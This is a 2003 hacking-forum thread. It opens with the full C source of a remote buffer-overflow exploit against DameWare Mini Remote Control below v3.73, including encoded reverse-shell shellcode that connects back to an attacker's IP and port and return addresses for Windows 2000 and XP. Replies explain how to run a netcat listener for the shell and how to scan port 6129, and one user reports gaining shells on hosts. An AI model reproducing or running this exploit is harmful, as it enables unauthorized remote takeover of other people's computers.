[GaLiaRePt]

DameWare Mini Remote Control < v3.73 remote exploit
Date: 2003-12-20

Author : Iv�n Rodriguez Almui�a <kralor_@_coromputer.net>
Download : http://www.security-...oit/DameWeird.c

/********************************************************************************
******/
/*     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]    */
/* -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -  */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68  v3.72                                     */
/* In comments there's some information about offsets for jmp esp on diff OS.         */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it  */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format)          */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in  */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find   */
/* another better EIP for XP (hope this 2 offsets will be enough).                    */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values.      */
/*...............................................................................
.....*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/********************************************************************************
******/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8   jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv     sp3
win2k fr pro     sp3
win2k en pro     sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

#define RET    "\xB8\x64\x75\x71"
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
	int i,j;
	char ascii[9];

	for(i=begin,j=0;i<end;i++,j++) {
  if(i%10==0) {
 	 printf("\r\n%04d: ",i);
 	 j=0;
  memset(ascii,0,sizeof(ascii));
  }
	printf("0x%02x ",(unsigned char)buffer[i]);
	if(i%10==9) {
  ascii[10]=0x00;
  printf("%s",ascii);
  }
	if(!isprint(buffer[i]))
  ascii[j]='.';
	else
  ascii[j]=buffer[i];
	}
	printf("%s\r\n",ascii);
	return;
}
*/

int cnx(char *host)
{
	int sock;
	struct sockaddr_in yeah;
	struct hostent *she;

	sock=socket(AF_INET,SOCK_STREAM,0);
	if(!sock) {
  printf("error: unable to create socket\r\n");
  return 0;
  }
	yeah.sin_family=AF_INET; 
	yeah.sin_addr.s_addr=inet_addr(host); 
	yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) { 
	memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length); 
	} else { 
	if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
  printf("error: cannot resolve host\r\n");
  return 0;
  } 
	}
	printf("[+] Connecting to %-30s ...",host);
	if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
  printf("error: connection refused\r\n");
  return 0;
  }
	printf("Done\r\n");
	return sock;
}

void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
	unsigned int ip=0;
	unsigned short port=0;
	char *port_to_shell="",*ip1="";

	ip = inet_addr(rhost); ip1 = (char*)&ip;
	shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
	shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

	port = htons(rport);
	port_to_shell = (char *) &port;
	shellc0de[319]=port_to_shell[0]^0x95;
	shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/*
	switch(sp)
	{
	case 0:
  *(long*)&shellc0de[0]=RET_WIN2K_SP0;
  break;
	case 1:
  *(long*)&shellc0de[0]=RET_WIN2K_SP1;
  break;
	case 2:
  *(long*)&shellc0de[0]=RET_WIN2K_SP2;
  break;
	case 3:
  *(long*)&shellc0de[0]=RET_WIN2K_SP3;
  break;
	case 4:
  *(long*)&shellc0de[0]=RET_WIN2K_SP4;
  break;
	}
*/
	break;
case 1: // winXP
	shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
	shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
	switch(sp)
	{
	case 0:
  *(long*)&shellc0de[0]=RET_WINXP_SP0;
  break;
	case 1:
  *(long*)&shellc0de[0]=RET_WINXP_SP1;
  break;
	}
*/
	break;
	}
	return;
}

int start_auth(int sock, char *rhost, int rport)
{
	int size,i=4,os,sp;
	char buffer[SIZEOF];
	char shellc0de[] =
        "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
        "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
        "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
        "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
        "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
        "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
        "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
        "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
        "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
        "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
        "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
        "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
        "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
        "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
        "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
        "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
        "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
        "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
        "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
        "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
        "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
        "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
        "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
        "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
        "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
        "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
        "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
        "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
        "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

	size=recv(sock,buffer,SIZEOF,0);
	if(buffer[0]!=0x30||buffer[1]!=0x11) {
  printf("error: wrong data received\r\n");
  return -1;
  }
	buffer[28]=0x00;buffer[36]=0x01;
	send(sock,buffer,size,0);
	memset(buffer,0,SIZEOF);
	printf("[+] Gathering %-30s     ...","information");
	for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

	if(buffer[0]!=0x10||buffer[1]!=0x27) {
  printf("error: wrong data received\r\n");
  return -1;
	}
	printf("Done\r\n");
	sp=(unsigned int)buffer[37];
	printf("[i] Operating system : ");
	if(buffer[16]==0x28||buffer[17]==0x0a) {
	os=1;
	printf("WinXP");
	} else {
  printf("Win2000");
  os=0;
	}
	printf("\r\n[i] Service Pack     : %s\r\n",&buffer[37]);
	printf("[+] Setting shellc0de for this %-15s   ...","version");
	set_sc(os,sp,rhost,rport,shellc0de);
	
	memset(&buffer[2],0,SIZEOF-2);
	strcpy(&buffer[175],WINUSER);
	memset(&buffer[416],0x90,180);
if(os==0)
	memcpy(&buffer[516],RET,4);
else
	memcpy(&buffer[516],RET_XP,4);
	memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
	strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
	strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
	strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
	strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
	strcpy(&buffer[2795],CLIENT_VERSION);
	printf("Done\r\n");
	printf("[+] Sending evil %-30s  ...","packet");
	send(sock,buffer,SIZEOF,0);
	memset(buffer,0,SIZEOF);
	size=recv(sock,buffer,SIZEOF,0);

	if(buffer[0]!=0x32||buffer[1]!=0x11) {
  printf("Patched\r\n");
  return -1;
	}
	printf("Done\r\n");
	printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
	return 0;
}

void banner(void)
{
	printf("\r\n      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
	printf("\t\t  www.coromputer.net && undernet #coromputer\r\n\r\n");
	return;
}

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	int sock;

	banner();
	if(argc!=4) {
  printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
  return -1;
	}
if(WSAStartup(0x0101,&wsaData)!=0) {
	printf("error: unable to load winsock\r\n");
	return -1;
	}
	sock=cnx(argv[1]);
if(!sock)
	return -1;
	start_auth(sock,argv[2],atoi(argv[3]));
	return 0;
}

Enjoy ;-)

[temptation]

DameWare Mini Remote Control
^^ on which port is this running?

thx

[Lanig]

hmm to scan for this vuln i need to scan port 6129 (default for this service i think)
or is there some better way?

[Yosam]

hmm, compiled successfully but,
what is <your_port> ?
what should i put in there?

and how do i scan for this?
which port should i scan and what banner (if needed) ?


thanks.

[PuPPaFiSH]

Thank for the info, I'll try and compile it ;)

[Divx_dude]

Yosam, on Dec 20 2003, 02:38 PM, said:

hmm, compiled successfully but,
what is <your_port> ?
what should i put in there?

and how do i scan for this?
which port should i scan and what banner (if needed) ?


thanks.

well u need to run a shell on your pc on port ( example ) 444

then u go to the exploit and ya give your ip in + the port whats your nc is running on your pc


sorry for bad english

[KoNh]

X-FloppY, on Dec 20 2003, 03:04 PM, said:

i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam

just try to compile yerself, this way we can
try to keep out some scripts kiddyz, unless yer one ?

[Divx_dude]

dude ;) ther emany progs for compiling ;)

DEV c++ is a very good one ;) try google and search :)

sorry for bad english

[JdEeZy]

great exploit, got some shells.

[Axl]

Lanig, on Dec 20 2003, 02:37 PM, said:

hmm to scan for this vuln i need to scan port 6129 (default for this service i think)
or is there some better way?

I find scanning for 6129 to be most likely the best way. Problem is at least on the ranges i scan nobody has 6129 open :angry: